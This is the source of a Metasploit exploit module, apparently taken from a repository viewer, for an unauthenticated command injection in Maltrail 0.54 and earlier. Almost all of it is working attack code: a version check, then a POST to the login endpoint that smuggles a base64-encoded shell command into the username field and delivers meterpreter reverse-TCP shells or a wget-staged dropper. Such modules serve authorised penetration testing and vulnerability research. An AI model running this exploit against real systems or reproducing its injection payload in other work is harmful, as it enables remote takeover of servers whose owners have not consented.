Path: blob/master/modules/exploits/unix/http/maltrail_rce.rb
19934 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient9include Msf::Exploit::CmdStager10prepend Msf::Exploit::Remote::AutoCheck1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'Maltrail Unauthenticated Command Injection',17'Description' => %q{18Maltrail is a malicious traffic detection system, utilizing publicly19available blacklists containing malicious and/or generally suspicious trails.20The Maltrail versions <= 0.54 is suffering from a command injection vulnerability.21The `subprocess.check_output` function in `mailtrail/core/httpd.py` contains22a command injection vulnerability in the `params.get("username")` parameter.23An attacker can exploit this vulnerability by injecting arbitrary OS commands24into the username parameter. The injected commands will be executed with the25privileges of the running process. This vulnerability can be exploited remotely26without authentication.2728Successfully tested against Maltrail versions 0.52 and 0.53.29},30'License' => MSF_LICENSE,31'Author' => [32'Ege BALCI <egebalci[at]pm.me>', # msf module33'Valentin Lobstein', # Add CVE reference + rewrite34'Chris Wild', # original PoC, analysis35],36'References' => [37['EDB', '51676'],38['CVE', '2025-34073'],39['URL', 'https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/'],40['URL', 'https://github.com/stamparm/maltrail/issues/19146']41],42'Platform' => %w[unix linux],43'Privileged' => false,44'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],45'Targets' => [46[47'Unix Command',48{49'Platform' => 'unix',50'Arch' => ARCH_CMD,51'Type' => :unix_cmd,52'DefaultOptions' => {53'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'54}55}56],57[58'Linux Dropper',59{60'Platform' => 'linux',61'Arch' => [ARCH_X86, ARCH_X64],62'Type' => :linux_dropper,63'CmdStagerFlavor' => :wget,64'DefaultOptions' => {65'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'66}67}68]69],70'DisclosureDate' => '2023-07-31',71'DefaultTarget' => 0,72'Notes' => {73'Stability' => [CRASH_SAFE],74'Reliability' => [REPEATABLE_SESSION],75'SideEffects' => []76}77)78)79register_options(80[81Opt::RPORT(8338),82OptString.new('TARGETURI', [ true, 'The URI of the Maltrail server', '/'])83]84)85end8687def check88res = send_request_cgi(89'uri' => normalize_uri(target_uri.path),90'method' => 'GET'91)92return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?93return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 2009495version = Rex::Version.new(Regexp.last_match(1)) if res.body =~ %r{\(v<b>([0-9.]+)</b>\)}9697if version < Rex::Version.new('0.54')98return CheckCode::Appears("Version Detected: #{version}")99end100101CheckCode::Safe("Version Detected: #{version}")102end103104def execute_command(cmd, _opts = {})105send_request_cgi(106'uri' => normalize_uri(target_uri.path, 'login'),107'method' => 'POST',108'uri_encode_mode' => 'none',109'headers' => {110'ctype' => 'application/x-www-form-urlencoded'111},112'data' => "username=;`echo+\"#{Rex::Text.encode_base64(cmd)}\"+|+base64+-d+|+sh;#`"113)114end115116def exploit117case target['Type']118when :unix_cmd119print_status("Executing #{target.name}...")120execute_command(payload.encoded)121when :linux_dropper122print_status("Executing #{target.name}...")123execute_cmdstager124end125end126end127128129